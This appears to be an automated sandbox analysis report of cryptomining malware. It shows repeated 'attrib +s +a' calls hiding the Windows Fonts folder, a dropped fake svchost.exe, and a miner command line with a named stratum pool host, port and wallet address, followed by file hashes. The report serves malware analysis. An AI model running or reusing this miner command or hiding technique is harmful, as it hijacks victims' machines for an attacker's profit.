C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3476
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4128
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2452
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:868
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:1312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2724
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4816
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:5088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:384
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3064
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2476
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3492
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3396
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3612
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2260
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3024
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1204
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4336
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3592
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4272
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4232
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4980
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:5064
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2128
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2212
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3068
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4856
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2016
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4936
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:1016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1636
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4048
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4064
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1188
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4128
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1788
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:5112
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2512
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:4780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3012
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3192
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1984
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:1308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3300
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:1352
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1428
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3044
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1016
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1912
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2264
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:688
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4492
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3532
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:5092
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3536
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4456
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3524
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2180
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:5088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4876
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4516
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4224
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3976
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:5084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1100
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4556
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3404
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3588
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2384
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:668
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2824
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3660
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1648
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1668
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:5012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2396
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2348
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4564
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2604
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2212
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:4820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1308
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:212
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1100
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4556
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4428
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4832
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:712
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1752
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:668
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4080
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4852
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2636
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4568
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:4680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2452
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2412
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2348
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:5080
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:740
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4588
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3976
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1172
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1352
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1960
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1428
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4936
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3444
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2684
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3636
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:2240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4048
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:5056
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:408
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1668
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2396
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3280
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4004
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2896
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:2568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1316
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1712
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4820
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1140
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1984
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3492
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:5040
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:668
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3788
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4132
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4508
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3784
-
-
-
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
PID:2544 -
\??\c:\windows\Fonts\KvMonXP.exe"KvMonXP" -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
257B
MD5f88a489a387ebc7c4c0c6b122ff6aa9b
SHA1197f045b81fc47892ec4b879f4b55ef1fda8f307
SHA2568d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a
SHA512046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391
-
Filesize
1.2MB
MD5614a11a087f7e05063f6211c114a29ba
SHA1903e200c338fd0a15e87214824c7f670cc7d282c
SHA256dda35a9441451839439a7da695209c6164ca0e7d0159b4bc012406a8a3f18ce4
SHA512947521a703af5c097199001f62cefc58b65d7cf723a4afe5a3b1f0b80e16ce7f357b1874f31b1cc5f55907fc18480e903313edcee02328b2527c00559d6d9f96
-
Filesize
4.4MB
MD55d57bf45fb91812ead7ad8da8c3936a2
SHA1099c88af6ea4a49d2f80123c47fe85407ec42d69
SHA256553b1ab96e8204792f764fe25331aef9fa4c479b11b6154551d1b609e0158019
SHA51266b04caac0f5e1904bbd567a25734bf80dcf8982737e7bf6c68b10f07dd955445743ba76c0bad8cabf3650ec8202f73b864553ae10e39914a7c13395ee2a5cf3
-
Filesize
292KB
MD50a7d7ed55c4202f5106824f11ecb22fa
SHA1730da74e178d7b114e5d4c0f1dcc956accd4942d
SHA2565657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595
